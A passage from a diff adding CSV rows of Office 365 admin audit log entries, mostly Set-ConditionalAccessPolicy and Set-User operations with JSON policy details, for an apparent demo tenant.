+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-14T02:07:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Semolen - Admin MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\5fd0c4ff-1cd7-4bf6-8607-294a04f58f12""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""142512c7-f006-46ae-909c-14fa7bf6a887\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Azure MFA""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:33Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\bcd93f74-64fd-4042-a3ae-ee6d48886d6d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Form MCAS""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8872f6fb-da88-4b63-bcc7-17247669596b""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""09abbdfd-ed23-44ee-a2d9-a627aa1c90f3\"",\""cc15fd57-2c6c-4117-a88c-83b1d56b4bbe\"",\""00000003-0000-0ff1-ce00-000000000000\"",\""00000005-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:31 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-14T02:07:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T02:07:32Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 2:07:32 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T00:14:10Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-14T04:14:36Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\c0ac7c08-4133-4a68-bf34-92a14e1da898""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-13T23:35:05Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-13T22:12:45Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\c0ac7c08-4133-4a68-bf34-92a14e1da898""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-13T11:31:19Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-13T12:45:35Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\4fa53e5c-cfa7-4206-8b32-0c555070f202""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  },
+  {
+    ""Name"": ""ErrorAction"",
+    ""Value"": ""Stop""
+  }
+]"
+2020-05-13T17:33:52Z,,,Set-User,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""4b2462a4-bbee-495a-a0e1-f23ae524cc9c\\a792cdf5-6148-47eb-85fe-044ee521d534""
+  },
+  {
+    ""Name"": ""SyncMailboxLocationGuids"",
+    ""Value"": ""True""
+  }
+]"
+2020-05-14T05:04:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\69c7a12f-b407-45a3-b07e-fa04fc7f273d""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Test Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\b2915792-0396-4abe-94ec-e17fa17243c5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""94c63fef-13a3-47bc-8074-75af8c65887a\"",\""c9a559d2-7aab-4f13-a6ed-e7e9c52aec87\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""bdb72692-2275-412b-8af0-ea21c2ebd174\"",\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""SignInRisks\"":{\""Include\"":[{\""SignInRisks\"":[\""High\"",\""Medium\"",\""Low\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":3}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""GBB demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:37Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\8837fdaa-aaeb-4432-9622-43f6f583d583""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""KnownNetworkPolicies\"":{\""NetworkName\"":\""BE-Office\"",\""NetworkId\"":\""b98b9088-ce88-4fae-80fb-5b58cb1ce685\"",\""CidrIpRanges\"":[\""109.88.218.99/28\""],\""CountryIsoCodes\"":null,\""Categories\"":[],\""ApplyToUnknownCountry\"":false}}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""6""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Known Networks List""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": ""3/19/2020 7:45:08 PM""
+  }
+]"
+2020-05-14T05:04:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\6490d00c-7ba1-42cf-aa88-99eb71d53bf7""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""LastUpdatedTimestamp\"":\""2020-04-09T17:01:29.9572143Z\"",\""State\"":\""Disabled\"",\""SignInFrequency\"":\""NotSet\"",\""PersistentBrowserSessionMode\"":\""NotSet\""}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": ""18""
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Default Policy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Acrs\"":[\""urn:microsoft:req1\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:34 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""MeganB MCAS Step-up""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\ba36f0a4-6d73-4ba4-9282-3b3c14575e36""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\"",\""00000003-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Block Access JulianI""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:34Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\235bec94-f744-48ac-8314-5675953d2def""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Disabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""All\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""eababd92-9dc7-40e3-9359-6c106522db19\""]}]},\""DevicePlatforms\"":{\""Include\"":[{\""DevicePlatforms\"":[\""All\""]}],\""Exclude\"":[{\""DevicePlatforms\"":[\""macOS\""]}]}},\""Controls\"":[{\""Control\"":[\""Mfa\""]}],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:33 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""Megan MFA demo""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:36Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\e183bd29-a3a3-4f91-a5a3-b83b21a544df""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Enabled\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""00000002-0000-0ff1-ce00-000000000000\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""2935e535-8fdf-4217-865b-e084cb7214f1\""]}]}},\""SessionControls\"":[\""AppEnforcedRestrictions\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:36 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""JulianI Exchange native controls""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\2e76d011-eaa3-40b4-8ce8-7fba52bf3af8""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
+    ""Value"": ""{\""Version\"":0,\""State\"":\""Reporting\"",\""Conditions\"":{\""Applications\"":{\""Include\"":[{\""Applications\"":[\""f9e8b3d0-ba26-42cd-b544-c90a66191a81\""]}]},\""Users\"":{\""Include\"":[{\""Users\"":[\""All\""]}]}},\""SessionControls\"":[\""CloudAppSecurity\""],\""PersistentBrowserSessionMode\"":\""NotSet\"",\""EnforceAllPoliciesForEas\"":false,\""IncludeOtherLegacyClientTypeForEvaluation\"":false,\""CasSessionControlType\"":1}""
+  },
+  {
+    ""Name"": ""PolicyLastUpdatedTime"",
+    ""Value"": ""5/14/2020 5:04:35 AM""
+  },
+  {
+    ""Name"": ""TenantDefaultPolicy"",
+    ""Value"": """"
+  },
+  {
+    ""Name"": ""DisplayName"",
+    ""Value"": ""On-Prem SharePoint - MeganB proxy""
+  },
+  {
+    ""Name"": ""PolicyIdentifierString"",
+    ""Value"": """"
+  }
+]"
+2020-05-14T05:04:35Z,,,Set-ConditionalAccessPolicy,"[
+  {
+    ""Name"": ""Identity"",
+    ""Value"": ""seccxpninja.onmicrosoft.com\\4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26""
+  },
+  {
+    ""Name"": ""PolicyDetails"",
